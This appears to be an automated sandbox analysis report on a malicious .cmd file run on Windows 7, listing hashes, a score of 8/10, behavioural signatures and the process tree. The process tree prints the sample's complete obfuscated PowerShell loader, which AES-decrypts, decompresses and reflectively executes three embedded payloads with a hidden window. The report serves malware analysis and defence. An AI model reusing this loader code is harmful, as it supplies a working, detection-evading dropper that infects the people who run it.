Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-11-2024 13:59
Static task
static1
Behavioral task
behavioral1
Sample
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd
Resource
win7-20240708-en
4 signatures
150 seconds
General
-
Target
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd
-
Size
2.0MB
-
MD5
a83ac24f3b7291351f52ea99c33b43ca
-
SHA1
4819de0035af164608341bdab34fe277cc517536
-
SHA256
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848
-
SHA512
af2301759d1037f609b876090eb188f0747ecf7c4d3e5ebd23395389dd23c1398cd123a902d015d47018f1ef686b44908cca3280d86ccc4a1993b7c0388b9551
-
SSDEEP
24576:r7ftZVfP4Eg45n691f/qE71faFpIx6SXP1nOEunZ8/O2x01+dHepYAk0NkVG7/dp:rdLA9Fi7IxDRK294y7D/h2R
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3028 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2360 wrote to memory of 3024 2360 cmd.exe 32 PID 2360 wrote to memory of 3024 2360 cmd.exe 32 PID 2360 wrote to memory of 3024 2360 cmd.exe 32 PID 2360 wrote to memory of 3028 2360 cmd.exe 33 PID 2360 wrote to memory of 3028 2360 cmd.exe 33 PID 2360 wrote to memory of 3028 2360 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('byOwlJEq9UaHWPvf8iRQsbA+J/FwJgSUsZSwL1NNg8o='); $aes_var.IV=[System.Convert]::FromBase64String('jlnOHC6q2ppF5ItJ8IOVtA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Yytzc=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$fsmDR=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$DKcCE=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Yytzc, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $DKcCE.CopyTo($fsmDR); $DKcCE.Dispose(); $Yytzc.Dispose(); $fsmDR.Dispose(); $fsmDR.ToArray();}function execute_function($param_var,$param2_var){ IEX '$DfiAV=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$sYTdY=$DfiAV.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$sYTdY.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$hxgif = 'C:\Users\Admin\AppData\Local\Temp\ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd';$host.UI.RawUI.WindowTitle = $hxgif;$qrlCl=[System.IO.File]::ReadAllText($hxgif).Split([Environment]::NewLine);foreach ($SwqTj in $qrlCl) { if ($SwqTj.StartsWith('bRlIVVrKLnBjMLQIZMQv')) { $silSH=$SwqTj.Substring(20); break; }}$payloads_var=[string[]]$silSH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-